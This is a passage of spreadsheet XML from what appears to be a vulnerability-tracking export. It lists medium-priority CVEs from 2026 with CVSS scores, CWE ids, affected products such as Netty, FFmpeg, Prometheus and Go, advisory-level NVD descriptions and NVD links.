      <c r="K2569" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L2569" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.</t>
        </is>
      </c>
      <c r="M2569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33870</t>
        </is>
      </c>
    </row>
    <row r="2570">
      <c r="A2570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33894</t>
        </is>
      </c>
      <c r="C2570" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2570" s="5" t="inlineStr"/>
      <c r="F2570" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2570" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2570" s="5" t="inlineStr">
        <is>
          <t>digitalbazaar:forge</t>
        </is>
      </c>
      <c r="I2570" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J2570" s="5" t="inlineStr"/>
      <c r="K2570" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-347</t>
        </is>
      </c>
      <c r="L2570" s="5" t="inlineStr">
        <is>
          <t>Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.</t>
        </is>
      </c>
      <c r="M2570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33894</t>
        </is>
      </c>
    </row>
    <row r="2571">
      <c r="A2571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34355</t>
        </is>
      </c>
      <c r="C2571" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2571" s="5" t="inlineStr"/>
      <c r="F2571" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2571" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2571" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I2571" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J2571" s="5" t="inlineStr"/>
      <c r="K2571" s="5" t="inlineStr">
        <is>
          <t>CWE-120, CWE-122</t>
        </is>
      </c>
      <c r="L2571" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend.
Users are recommended to upgrade to version 2.4.68, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34355</t>
        </is>
      </c>
    </row>
    <row r="2572">
      <c r="A2572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34986</t>
        </is>
      </c>
      <c r="C2572" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2572" s="5" t="inlineStr"/>
      <c r="F2572" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2572" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2572" s="5" t="inlineStr">
        <is>
          <t>go-jose_project:go-jose</t>
        </is>
      </c>
      <c r="I2572" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J2572" s="5" t="inlineStr"/>
      <c r="K2572" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-248</t>
        </is>
      </c>
      <c r="L2572" s="5" t="inlineStr">
        <is>
          <t>Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. Prior to 4.1.4 and 3.0.5, decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key. This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected. This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common. Panics can lead to denial of service. This vulnerability is fixed in 4.1.4 and 3.0.5.</t>
        </is>
      </c>
      <c r="M2572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34986</t>
        </is>
      </c>
    </row>
    <row r="2573">
      <c r="A2573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35172</t>
        </is>
      </c>
      <c r="C2573" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2573" s="5" t="inlineStr"/>
      <c r="F2573" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2573" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2573" s="5" t="inlineStr">
        <is>
          <t>distribution:distribution</t>
        </is>
      </c>
      <c r="I2573" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J2573" s="5" t="inlineStr"/>
      <c r="K2573" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-524</t>
        </is>
      </c>
      <c r="L2573" s="5" t="inlineStr">
        <is>
          <t>Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, distribution can restore read access in repo a after an explicit delete when storage.cache.blobdescriptor: redis and storage.delete.enabled: true are both enabled. The delete path clears the shared digest descriptor but leaves stale repo-scoped membership behind, so a later Stat or Get from repo b repopulates the shared descriptor and makes the deleted blob readable from repo a again. This vulnerability is fixed in 3.1.0.</t>
        </is>
      </c>
      <c r="M2573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35172</t>
        </is>
      </c>
    </row>
    <row r="2574">
      <c r="A2574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37198</t>
        </is>
      </c>
      <c r="C2574" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2574" s="5" t="inlineStr"/>
      <c r="F2574" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2574" s="5" t="inlineStr"/>
      <c r="H2574" s="5" t="inlineStr"/>
      <c r="I2574" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2574" s="5" t="inlineStr"/>
      <c r="K2574" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2574" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the SMF component of Open5GS v2.7.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted GTP packet.</t>
        </is>
      </c>
      <c r="M2574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37198</t>
        </is>
      </c>
    </row>
    <row r="2575">
      <c r="A2575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37237</t>
        </is>
      </c>
      <c r="C2575" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2575" s="5" t="inlineStr"/>
      <c r="F2575" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2575" s="5" t="inlineStr"/>
      <c r="H2575" s="5" t="inlineStr"/>
      <c r="I2575" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2575" s="5" t="inlineStr"/>
      <c r="K2575" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2575" s="5" t="inlineStr">
        <is>
          <t>vLLM up to and including 0.17.0 allows remote attackers to cause a Denial of Service via memory exhaustion. The AsyncMediaIO.fetch_audio and AsyncMediaIO.fetch_image functions in multimodal/inputs.py fetch user-supplied media URLs using aiohttp and call r.read() without enforcing a maximum response size, allowing an attacker to exhaust server memory by providing a URL to an arbitrarily large file.</t>
        </is>
      </c>
      <c r="M2575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37237</t>
        </is>
      </c>
    </row>
    <row r="2576">
      <c r="A2576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37736</t>
        </is>
      </c>
      <c r="C2576" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2576" s="5" t="inlineStr"/>
      <c r="F2576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2576" s="5" t="inlineStr"/>
      <c r="H2576" s="5" t="inlineStr"/>
      <c r="I2576" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2576" s="5" t="inlineStr"/>
      <c r="K2576" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2576" s="5" t="inlineStr">
        <is>
          <t>An issue in the JsonSanitizer.sanitize() component of OWASP json-sanitizer v1.2.3 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37736</t>
        </is>
      </c>
    </row>
    <row r="2577">
      <c r="A2577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38344</t>
        </is>
      </c>
      <c r="C2577" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2577" s="5" t="inlineStr"/>
      <c r="F2577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2577" s="5" t="inlineStr"/>
      <c r="H2577" s="5" t="inlineStr"/>
      <c r="I2577" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2577" s="5" t="inlineStr"/>
      <c r="K2577" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2577" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference in the get_min_buffer_size function (/libswscale/slice.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="M2577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38344</t>
        </is>
      </c>
    </row>
    <row r="2578">
      <c r="A2578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38346</t>
        </is>
      </c>
      <c r="C2578" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2578" s="5" t="inlineStr"/>
      <c r="F2578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2578" s="5" t="inlineStr"/>
      <c r="H2578" s="5" t="inlineStr"/>
      <c r="I2578" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2578" s="5" t="inlineStr"/>
      <c r="K2578" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2578" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the yuv2planeX_8_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="M2578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38346</t>
        </is>
      </c>
    </row>
    <row r="2579">
      <c r="A2579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38347</t>
        </is>
      </c>
      <c r="C2579" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2579" s="5" t="inlineStr"/>
      <c r="F2579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2579" s="5" t="inlineStr"/>
      <c r="H2579" s="5" t="inlineStr"/>
      <c r="I2579" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2579" s="5" t="inlineStr"/>
      <c r="K2579" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2579" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the ff_sws_alphablendaway function (libswscale/alphablend.c) of FFmpeg git-master commit 722a217 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38347</t>
        </is>
      </c>
    </row>
    <row r="2580">
      <c r="A2580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38348</t>
        </is>
      </c>
      <c r="C2580" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2580" s="5" t="inlineStr"/>
      <c r="F2580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2580" s="5" t="inlineStr"/>
      <c r="H2580" s="5" t="inlineStr"/>
      <c r="I2580" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2580" s="5" t="inlineStr"/>
      <c r="K2580" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2580" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libswscale/utils.c component of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="M2580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38348</t>
        </is>
      </c>
    </row>
    <row r="2581">
      <c r="A2581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38349</t>
        </is>
      </c>
      <c r="C2581" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2581" s="5" t="inlineStr"/>
      <c r="F2581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2581" s="5" t="inlineStr"/>
      <c r="H2581" s="5" t="inlineStr"/>
      <c r="I2581" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2581" s="5" t="inlineStr"/>
      <c r="K2581" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2581" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the hScale16To19_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="M2581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38349</t>
        </is>
      </c>
    </row>
    <row r="2582">
      <c r="A2582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38350</t>
        </is>
      </c>
      <c r="C2582" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2582" s="5" t="inlineStr"/>
      <c r="F2582" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2582" s="5" t="inlineStr"/>
      <c r="H2582" s="5" t="inlineStr"/>
      <c r="I2582" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2582" s="5" t="inlineStr"/>
      <c r="K2582" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2582" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the target_sws_fuzzer() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.</t>
        </is>
      </c>
      <c r="M2582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38350</t>
        </is>
      </c>
    </row>
    <row r="2583">
      <c r="A2583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38636</t>
        </is>
      </c>
      <c r="C2583" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2583" s="5" t="inlineStr"/>
      <c r="F2583" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2583" s="5" t="inlineStr"/>
      <c r="H2583" s="5" t="inlineStr"/>
      <c r="I2583" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2583" s="5" t="inlineStr"/>
      <c r="K2583" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2583" s="5" t="inlineStr">
        <is>
          <t>An issue in the seekdir() function (/dirent/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38636</t>
        </is>
      </c>
    </row>
    <row r="2584">
      <c r="A2584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38638</t>
        </is>
      </c>
      <c r="C2584" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2584" s="5" t="inlineStr"/>
      <c r="F2584" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2584" s="5" t="inlineStr"/>
      <c r="H2584" s="5" t="inlineStr"/>
      <c r="I2584" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2584" s="5" t="inlineStr"/>
      <c r="K2584" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2584" s="5" t="inlineStr">
        <is>
          <t>An issue in the with_argv function (/unistd/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38638</t>
        </is>
      </c>
    </row>
    <row r="2585">
      <c r="A2585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39820</t>
        </is>
      </c>
      <c r="C2585" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2585" s="5" t="inlineStr"/>
      <c r="F2585" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2585" s="5" t="inlineStr"/>
      <c r="H2585" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2585" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2585" s="5" t="inlineStr"/>
      <c r="K2585" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-770</t>
        </is>
      </c>
      <c r="L2585" s="5" t="inlineStr">
        <is>
          <t>Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations.</t>
        </is>
      </c>
      <c r="M2585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39820</t>
        </is>
      </c>
    </row>
    <row r="2586">
      <c r="A2586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39829</t>
        </is>
      </c>
      <c r="C2586" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2586" s="5" t="inlineStr"/>
      <c r="F2586" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2586" s="5" t="inlineStr"/>
      <c r="H2586" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I2586" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J2586" s="5" t="inlineStr"/>
      <c r="K2586" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-347</t>
        </is>
      </c>
      <c r="L2586" s="5" t="inlineStr">
        <is>
          <t>The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2.</t>
        </is>
      </c>
      <c r="M2586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39829</t>
        </is>
      </c>
    </row>
    <row r="2587">
      <c r="A2587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41602</t>
        </is>
      </c>
      <c r="C2587" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2587" s="5" t="inlineStr"/>
      <c r="F2587" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2587" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2587" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2587" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2587" s="5" t="inlineStr"/>
      <c r="K2587" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2587" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41602</t>
        </is>
      </c>
    </row>
    <row r="2588">
      <c r="A2588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42151</t>
        </is>
      </c>
      <c r="C2588" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2588" s="5" t="inlineStr"/>
      <c r="F2588" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2588" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H2588" s="5" t="inlineStr">
        <is>
          <t>prometheus:prometheus</t>
        </is>
      </c>
      <c r="I2588" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J2588" s="5" t="inlineStr"/>
      <c r="K2588" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-256, CWE-312</t>
        </is>
      </c>
      <c r="L2588" s="5" t="inlineStr">
        <is>
          <t>Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the client_secret field in the Azure AD remote write OAuth configuration (storage/remote/azuread) was typed as string instead of Secret. Prometheus redacts fields of type Secret when serving the configuration via the /-/config HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint. This issue has been patched in versions 3.5.3 and 3.11.3.</t>
        </is>
      </c>
      <c r="M2588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42151</t>
        </is>
      </c>
    </row>
    <row r="2589">
      <c r="A2589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42154</t>
        </is>
      </c>
      <c r="C2589" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2589" s="5" t="inlineStr"/>
      <c r="F2589" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2589" s="5" t="inlineStr"/>
      <c r="H2589" s="5" t="inlineStr">
        <is>
          <t>prometheus:prometheus</t>
        </is>
      </c>
      <c r="I2589" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J2589" s="5" t="inlineStr"/>
      <c r="K2589" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L2589" s="5" t="inlineStr">
        <is>
          <t>Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the remote read endpoint (/api/v1/read) does not validate the declared decoded length in a snappy-compressed request body before allocating memory. An unauthenticated attacker can send a small payload that causes a huge heap allocation per request. Under concurrent load this can exhaust available memory and crash the Prometheus process. This issue has been patched in versions 3.5.3 and 3.11.3.</t>
        </is>
      </c>
      <c r="M2589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42154</t>
        </is>
      </c>
    </row>
    <row r="2590">
      <c r="A2590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42499</t>
        </is>
      </c>
      <c r="C2590" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2590" s="5" t="inlineStr"/>
      <c r="F2590" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2590" s="5" t="inlineStr"/>
      <c r="H2590" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2590" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2590" s="5" t="inlineStr"/>
      <c r="K2590" s="5" t="inlineStr">
        <is>
          <t>CWE-1046</t>
        </is>
      </c>
      <c r="L2590" s="5" t="inlineStr">
        <is>
          <t>Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322.</t>
        </is>
      </c>
      <c r="M2590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42499</t>
        </is>
      </c>
    </row>
    <row r="2591">
      <c r="A2591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
